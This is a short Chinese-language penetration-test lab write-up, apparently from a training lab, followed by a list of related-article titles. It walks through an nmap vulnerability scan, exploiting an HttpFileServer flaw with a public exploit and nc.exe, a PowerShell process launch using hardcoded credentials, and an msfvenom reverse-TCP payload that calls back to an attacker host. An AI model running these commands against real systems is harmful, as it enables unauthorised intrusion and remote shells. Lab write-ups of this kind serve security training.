nmap -T4 -A -sS -sV -vv --script vuln -p- --open -n -Pn 10.11.1.49 -oX 10.11.1.49.xml

xsltproc -o 10.11.1.49.html 10.11.1.49.xml

9505端口运行HttpFileServer服务,搜索HFS得到39161.py 修改里面的端口和放置nc.exe

得到shell

$secpasswd = ConvertTo-SecureString "aliceishere" -AsPlainText -Force

$mycreds = New-Object System.Management.Automation.PSCredential ("alice", $secpasswd)

$computer = "bethany2"

[System.Diagnostics.Process]::Start("C:\Users\Public\2.exe", "", $mycreds.Username, $mycreds.Password, $computer)

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.11.0.185 LPORT=444 -f exe -o 1.exe

powershell -ExecutionPolicy Bypass -File c:\users\public\msfvenom_test.ps1

得到alice的身份然后就可以查看prof.txt

Alice就是管理员,无需提权

1f1f1eb58e44d5d24e44070b3b29c0d5

渗透实战-HttpFileServer漏洞利用相关推荐

  1. 网络攻防实战研究 漏洞利用与提权读书笔记一

    网络攻防实战研究 漏洞利用与提权读书笔记一 第一章 提权基础 1.1提权概述 1.1.1提权简介 1.1.2 提权条件 1.1.3 提权准备工作 1.1.4 实施提权 1.2 Windows账号和密码 ...

  2. 2021-08-26 网安实验-Windows系统渗透测试之EternalBlue漏洞利用复现

    Metasploit :是一款开源的安全漏洞检测工具. fb工具目录:Shadow Brokers 公布的NSA方程式组织黑客工具包Windows部分工具,里面包含了IIS6.0.445端口.3389 ...

  3. mysql 渗透及漏洞利用总结

    Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP.和WAMP等,在针对网站渗透中,很 ...

  4. 【愚公系列】2023年05月 网络安全高级班 079.Kali LinuxMetasploit渗透测试(Metasploit漏洞利用阶段)

    文章目录 前言 一.Metasploit实战 1.漏洞利用阶段 1.1 网络服务攻击 1.1.1 MS12-020(Windows服务) 1.1.2 MS08-067(Windows服务) 1.1.3 ...

  5. MySQL 数据库渗透及漏洞利用总结

    MySQL 数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用 MySQL 作为其数据库支撑,目前很多架构都以 MySQL 作为数据库管理系统,例如 LAMP.和 WAMP 等. 在 ...

  6. zimbra漏洞利用

    记一次渗透测试zimbra漏洞利用 当时通过界面判断判断出开发利用zimbra搭建的网站.zimbra又存在多个漏洞. 1.首先通过利用了CVE-2019-9670 XXE漏洞来尝试读取/etc/pa ...

  7. 90.网络安全渗透测试—[常规漏洞挖掘与利用篇6]—[文件包含-PHP封装伪协议详解实战示例]

    我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.文件包含-PHP封装伪协议简介 1.php内置封装协议 2.data://命令执行-伪协议 3.zip:// ...

  8. 89.网络安全渗透测试—[常规漏洞挖掘与利用篇5]—[文件包含漏洞详解实战示例]

    我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.文件包含漏洞详解 1.文件包含漏洞相关概念 2.PHP文件包含漏洞相关概念 3.PHP文件包含漏洞利用:`构 ...

  9. ctf安全竞赛入门|漏洞利用、实战练习平台、CTF比赛资源库

    一.漏洞利用.实战练习平台 1.WebGoat漏洞练习环境 https://github.com/WebGoat/WebGoat https://github.com/WebGoat/WebGoat- ...

最新文章

  1. Windows 下面的 redis GUI操作工具
  2. 可可:框架和边界之间有什么区别?
  3. Linux echo命令和查看环境变量实例
  4. HTML5自定义播放器(简式)
  5. c#中窗体的close、dispose的区别及分析
  6. 【转载】实现软件架构质量属性的战术
  7. 冷热水龙头_冷热水龙头结构图是怎么样的
  8. 将Visual Studio Code和Windows Subsystem for Linux一起使用
  9. 第六章 PCB 的 DRC 检查、拼版设计及资料输出
  10. Sogou input method on Ubuntu
  11. 角色个人属性英文缩写
  12. 马虎词汇教程1-5(转载)
  13. 为什么可积不一定可导_函数可积、原函数存在、变上限函数的关系解读(绝对原创)...
  14. 【周志华机器学习】十二、计算学习
  15. javascript英语单词音节拆分_音节拆分与合并
  16. 正则表达式 (.*?)
  17. 关于EasyUI DataGrid行编辑时嵌入时间控件
  18. vue-cli 和 vite
  19. [附源码]计算机毕业设计JAVA剧本杀门店管理系统-
  20. 如何高效地学习开源项目

热门文章

  1. yolo3训练时的问题
  2. Pandas提取文本信息(身份证号码)
  3. 计算机取证 报告,计算机取证实验报告.pdf
  4. 银河麒麟桌面操作系统V10安装过程
  5. 电脑建立win7下wifi热点的问题解决
  6. 主讲:A1(老吴) 时间:2004-10-22 15:00 主题:0一点点编译。1解决DLL与EXE沟通时String和其它Memory的问题.2公布hmOlevariants.pas 3成批...
  7. javaweb JSP JAVA 电影院在线订票系统(电影购票系统 电影售票 电影票预订系统)(在线选座)
  8. AMEYA360:电子元器件购买网站有哪些,哪个网站好
  9. 动态网络下的极致隐匿?NA DFS去中心化存储协议助推NA(Nirvana)Chain成为企业级隐私网络
  10. 河北大学计算机科学与技术强吗,河北大学什么档次?河北大学强势学科有哪些?...